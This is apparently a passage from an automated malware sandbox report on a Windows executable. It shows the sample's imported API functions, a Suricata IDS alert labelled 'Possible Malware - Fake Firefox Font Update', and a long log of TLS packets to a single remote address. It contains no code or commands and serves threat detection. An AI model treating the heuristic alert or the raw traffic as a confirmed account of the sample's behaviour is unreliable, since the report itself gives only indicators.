                                                                    user32.dllCreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageW, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                    gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
                                                                    version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                    kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualAlloc, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalFindAtomA, GlobalDeleteAtom, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegFlushKey, RegCloseKey
                                                                    kernel32.dllSleep
                                                                    oleaut32.dllSafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                    comctl32.dll_TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                    winmm.dllsndPlaySoundA

                                                                    Possible Origin

                                                                    Language of compilation systemCountry where language is spokenMap
                                                                    EnglishUnited States

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-11-26T08:12:15.955374+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849706142.250.181.129443TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Nov 26, 2024 08:12:14.214750051 CET49705443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.214793921 CET44349705142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:14.214895010 CET49705443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.214972019 CET49705443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.215055943 CET44349705142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:14.215110064 CET49705443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.246114016 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.246165037 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:14.246318102 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.255412102 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:14.255426884 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:15.955230951 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:15.955374002 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:15.959990978 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:15.960017920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:15.960346937 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:16.005717993 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:16.046184063 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:16.087368011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.039520025 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.039530993 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.039660931 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.053195000 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.053205013 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.053301096 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.161731005 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.161883116 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.161916018 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.206764936 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.206788063 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.235270023 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.235333920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.235351086 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.235358953 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.235416889 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.241163015 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.250581026 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.250638008 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.250644922 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.261568069 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.261627913 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.261650085 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.275361061 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.275422096 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.275430918 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.288858891 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.288914919 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.288937092 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.302572966 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.302629948 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.302650928 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.316298962 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.316385031 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.316405058 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.330066919 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.330128908 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.330152988 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.343767881 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.343846083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.343869925 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.357369900 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.357438087 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.357459068 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.371191025 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.371273994 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.371293068 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.391176939 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.391247988 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.391273975 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.423305035 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.423362017 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.423382044 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.429846048 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.429918051 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.429930925 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.434003115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.434050083 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.434077024 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.434083939 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.434134007 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.447721004 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.447788954 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.447837114 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.447849035 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.458623886 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.458689928 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.458695889 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.468831062 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.468893051 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.468919039 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.477814913 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.477888107 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.477914095 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.488051891 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.488111019 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.488132000 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.498074055 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.498126030 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.498146057 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.509219885 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.509290934 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.509300947 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.518260956 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.518335104 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.518341064 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.528414011 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.528485060 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.528490067 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.537856102 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.537928104 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.537935972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.546952963 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.547051907 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.547061920 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.556463957 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.556528091 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.556534052 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.569958925 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.570087910 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.570112944 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.580008984 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.580071926 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.580079079 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.581809998 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.581857920 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.581862926 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.588927984 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.588995934 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.589001894 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.594501972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.594577074 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.594587088 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.601317883 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.601414919 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.601421118 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.607388973 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.607455015 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.607465982 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.615288019 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.615339041 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.615344048 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.620321989 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.620403051 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.620408058 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.625355005 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.625411034 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.625415087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.630645037 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.630702972 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.630707979 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.635972977 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.636034012 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.636039972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.640988111 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.641067028 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.641083956 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.646159887 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.646219015 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.646224022 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651412010 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651473999 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651473999 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.651484966 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.651526928 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.656636953 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.661607027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.661664009 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.661672115 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672323942 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672365904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672379971 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.672394991 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.672437906 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.673290968 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676922083 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676954031 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.676992893 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.677009106 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.677078009 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.682348967 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.686501980 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.686533928 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.686564922 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.686577082 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.686621904 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.691942930 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.696450949 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.696527958 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.696552038 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.700954914 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.700989008 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.701003075 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.701014042 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.701056004 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.706487894 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.710346937 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.710397959 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.710414886 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.715095997 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.715142965 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.715158939 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.720531940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.720568895 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.720582962 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.720596075 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.720639944 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.724302053 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.729752064 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.729804993 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.729815960 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.733546972 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.733602047 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.733613014 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.738754034 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.738811016 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.738821983 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.742651939 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.742712975 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.742722988 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.748343945 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.748400927 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.748410940 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.751415014 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.751463890 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.751473904 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.751609087 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.751648903 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.751653910 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.761892080 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.761965990 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.761976957 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.764370918 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.764494896 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.764503956 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.771989107 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.772042036 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.772052050 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.774313927 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.774363041 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.774372101 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.774950027 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.774997950 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.775005102 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.778449059 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.778501034 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.778511047 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.782635927 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.782691956 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.782701015 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.787086010 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.787137032 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.787146091 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.790384054 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.790435076 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.790443897 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.794138908 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.794197083 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.794207096 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.800445080 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.800503969 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.800513983 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.802228928 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.802280903 CET49706443192.168.2.8142.250.181.129
                                                                    Nov 26, 2024 08:12:20.802308083 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.806643009 CET44349706142.250.181.129192.168.2.8
                                                                    Nov 26, 2024 08:12:20.806709051 CET49706443192.168.2.8142.250.181.129
